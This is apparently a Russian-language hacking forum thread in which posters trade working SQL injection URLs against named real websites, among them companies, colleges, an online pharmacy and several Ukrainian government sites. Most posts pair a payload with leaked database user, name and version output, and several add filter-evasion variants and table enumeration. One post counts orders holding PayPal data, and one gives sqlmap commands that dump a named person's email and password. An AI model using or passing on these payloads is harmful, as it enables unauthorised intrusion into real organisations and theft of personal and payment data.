 |
|
06.01.2019, 11:51
|
|
Новичок
Регистрация: 25.04.2010
Сообщений: 0
С нами:
8445343
Репутация:
0
|
|
ОАО «Брест - ВТИ»
Код:
http://brestvti.by/product.php?id=-115+union+select+1,2,3,4,5,6--
Код:
http://brestvti.by/product.php?id=-115+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6--
|
|
|
25.02.2019, 05:48
|
|
Познающий
Регистрация: 23.02.2019
Сообщений: 65
С нами:
3801206
Репутация:
10
|
|
Actuaries
Код:
http://www.actuaries.org.hk/education.php?id=13%27%20union%20select%201,%27table%27,3,concat_ws(0x7C,user(),database(),%20version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18--+#
actuarie_db@localhost|actuarie_db|5.7.25
lltours
Код:
http://www.lltours.com.ve/hoteles/ficha-promo.php?id=69%20and%20false%20union%20select%201,2,3,concat_ws(0x7C,user(),database(),%20version()),5,6,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34
lltourssysweb@localhost|lltours|5.5.62-0+deb8u1
Aryapg College
Код:
https://www.aryapgcollege.com/event.php?id=67%20and%200=1%20union%20select%201,2,%27tables%27,concat_ws(0x7C,user(),database(),%20version()),5
aryapgco_a9p8g7c@localhost|aryapgco_collegepgarya9 649|10.0.38-MariaDB
|
|
|
|
25.02.2019, 05:59
|
|
Познающий
Регистрация: 23.02.2019
Сообщений: 65
С нами:
3801206
Репутация:
10
|
|
WignWeaveстоит за Mod_Security
Код:
http://www.wignweave.com/event.php?id=-34+/*!50000union*/+/*!50000select*/+1,2,%203,4,5,concat_ws(0x7C,user(),database(),version())--+
wignweav_shop@localhost|wignweav_shop|5.6.41-84.1
|
|
|
|
27.02.2019, 09:28
|
|
Познающий
Регистрация: 23.02.2019
Сообщений: 65
С нами:
3801206
Репутация:
10
|
|
Sprint15
Код:
https://www.sprint15.com/events/EMS/event.php?id=173%20and%20false%20union%20select%201,2,3,4,5,6,7,8,9,10,concat_ws(0x7C,user(),database(),%20version()),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--+
uspr_191808_0002@localhost|sprint15com_191808_db2| 5.5.62
Gl Bajaj Institute
Код:
http://www.glbimr.org/event.php?id=-55%27%20union%20select%201,concat_ws(0x7C,user(),database(),version()),3--+
glbimrfeb2019@localhost|glbimr_org_feb21|5.6.43
|
|
|
|
28.02.2019, 09:17
|
|
Познающий
Регистрация: 23.02.2019
Сообщений: 65
С нами:
3801206
Репутация:
10
|
|
Great Canadian Healthcare Mall
Вывода на страницу нет. Выводит в src аттрибут img тега.
Код:
view-source:http://greatcanadianhealthcaremall.com/product.php?id=-482%27%20/*!50000uNiOn*/%20/*!50000select*/%20%27im%20here2%27,2,3,4,concat_ws('|',current_user,@@version),6,7,8,9,10%20--%20&ptab=description&title=Nitroglycerin
canazqik_user@localhost | 10.1.37-MariaDB-cll-lve
Отфильтровывает многие функции, в том числе database()
Код:
view-source:http://greatcanadianhealthcaremall.com/product.php?id=-482%27%20/*!50000uNiOn*/%20/*!50000select*/%20%27im%20here2%27,2,3,4,/*!50000sCheMA_naMe*/,6,7,8,9,10 from%20/*!50000infoRmaTioN_scHeMa.sCheMatA*/--%20&ptab=description&title=Nitroglycerin
canazqik_db
Берем все таблицы
Код:
view-source:http://greatcanadianhealthcaremall.com/product.php?id=-482%27%20/*!50000uNiOn*/%20/*!50000select*/%20%27im%20here2%27,2,3,4,/*!50000group_concat(table_name)*/,6,7,8,9,10 from%20/*!50000infoRmaTioN_scHeMa.tables*/ where table_schema='canazqik_db'--%20&ptab=description&title=Nitroglycerin
Считаем что там вообще есть
Код:
view-source:http://greatcanadianhealthcaremall.com/product.php?id=-482%27%20/*!50000uNiOn*/%20/*!50000select*/%20%27im%20here2%27,2,3,4,/*!50000count(*)*/,6,7,8,9,10 from%20orders where length(paypaldata)>3--%20&ptab=description&title=Nitroglycerin
Astinsriwedarisolo
Код:
http://www.astinsriwedarisolo.com/product.php?id=-111111111111111111111111111%27%20union%20select%20%271%27,concat_ws(%27|%27,%20database(),user(),version()),%273%27,%274%27,%275%27,%276%27--+
astin|astin@localhost|5.5.44
Код:
http://www.astinsriwedarisolo.com/product.php?id=-1%27%20union%20select%20%271%27,group_concat(column_name,0x0a)%20,%273%27,%274%27,%275%27,%276%27%20from%20information_schema.columns%20where%20table_schema%20like%20database()%20and%20table_name=%27arf_member%27--+
Для тех кому не лень с переводчиком сидеть
Miyabi
Код:
http://www.miyabi.com.au/item.php?id=281%20and%201%3E2%20union%20select%201,2,3,4,5,6,7,concat_ws(%27|%27,user(),database(),version()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--+
driving_miyabi@bsd34.qnetau.com|driving_miyabi|5.7.21-log
Код:
http://www.miyabi.com.au/item.php?id=281%20and%201%3E2%20union%20select%201,2,3,4,5,6,7,user(),group_concat(column_name,0x0a),10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27MEMBER%27--+
|
|
|
|
09.03.2019, 03:52
|
|
Познающий
Регистрация: 23.02.2019
Сообщений: 65
С нами:
3801206
Репутация:
10
|
|
WebLoadmpStore
Код:
http://www.webloadmpstore.com/product.php?id=-3%20/*!12345uNioN*/+/*!12345SeLeCt*/+1,2,concat_ws(0x7c,database(),user(),version()),4,5,6,7
webloadm_new|webloadm_new@localhost|5.6.39-83.1
Corbett Foundation
Код:
http://www.corbettfoundation.org/product.php?id=-53%20union%20select%201,2,3,4,5,6,concat_ws(%27|%27,database(),user(),version()),8,9,10,11&cat=&subcat=
corbettf_org|corbettf_org@localhost|5.6.43
Go Healthy
Код:
https://gohealthy.co.za/product.php?id=-612%27%20union%20select%201,concat_ws(%27|%27,user(),database(),version()),group_concat(table_name,0x0a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20information_schema.tables%20where%20table_schema=database()--+
goheadbwpz_1@dedi909.jnb1.host-h.net|goheadbwpz_db1|10.1.38-MariaDB-1~jessie
|
|
|
|
04.04.2019, 07:36
|
|
Познающий
Регистрация: 23.02.2019
Сообщений: 65
С нами:
3801206
Репутация:
10
|
|
И так сливаю данную скулю найденную на smotra.ru, так как мое обращение к ним было проигнорировано.
Код:
sqlmap -u http://smotra.ru/market/cat/11*/ -D sm_test --dbms mysql --sql-shell --random-agent
DB: sm_test
USER: sm_test@localhost
VERSION: 5.1.73
И вот собственно Эрик:
Код:
sqlmap -u 'http://smotra.ru/market/cat/11*/' -D sm_test -T users -C email, password --where="slug='erik_davidych'" --dump --dbms mysql --random-agent
|
|
|
|
07.04.2019, 06:44
|
|
Познающий
Регистрация: 23.02.2019
Сообщений: 65
С нами:
3801206
Репутация:
10
|
|
Фискальная служба Украины
Код:
http://sfs.gov.ua/registration.php?search=area&hregion_id=2 and extractvalue(0x0a,concat(0x0a,(select concat_ws(0x7c,database(),user(),version()) )))
XPATH syntax error: ' site| front_tmp@10.85.6.2| 5.1.73'
И сразу быстрый вопрос. При появлении слова FROM сразу получается ошибка синтаксиса. Не могу дальше никак пройти.
Собственно сам вопрос: это действительно какая то ошибка синтаксиса или там такого рода фильтрация?
И как вообще эту дичь обойти, потому что не первый раз стопорится именно на FROM и ничего не заходит. Хакеры, подскажите
|
|
|
|
07.04.2019, 11:34
|
|
Познающий
Регистрация: 23.02.2019
Сообщений: 65
С нами:
3801206
Репутация:
10
|
|
Національна Академія Аграрних наук України
Код:
http://imesg.gov.ua/info/index.php?id=41
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=41' AND 2988=2988 AND 'ouFu'='ouFu
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=41' AND SLEEP(5) AND 'cnAl'='cnAl
VERSION: 5.6.34
USER: imesg_db_utf@localhost
DB: imesg_db_utf
Управление труда и социальной защиты населения Хмельницкого городского совета
Код:
https://soczahist.khm.gov.ua/index.php?ID=-423%20union%20select%20concat_ws(0x7c,database(),version(),user()),group_concat(table_name),3,4%20from%20information_schema.tables%20where%20table_schema=database()
soczahis_soczah| 5.5.53| soczahis_soczah@localhost
Что то с оборотом наркотиков и их лицензии
Код:
http://usuan.dls.gov.ua/filial.php?id=-4347%20union%20select%201,concat_ws(0x7c,%20database(),user(),%20version()),3,4,5,6,7,8,9,11,12,13,14
usuan|5.6.38|usuan@localhost
|
|
|
|
08.04.2019, 09:53
|
|
Новичок
Регистрация: 25.04.2010
Сообщений: 0
С нами:
8445343
Репутация:
0
|
|
Код:
http://www.blubud.it/eng/news.php?id=-88+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7--
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
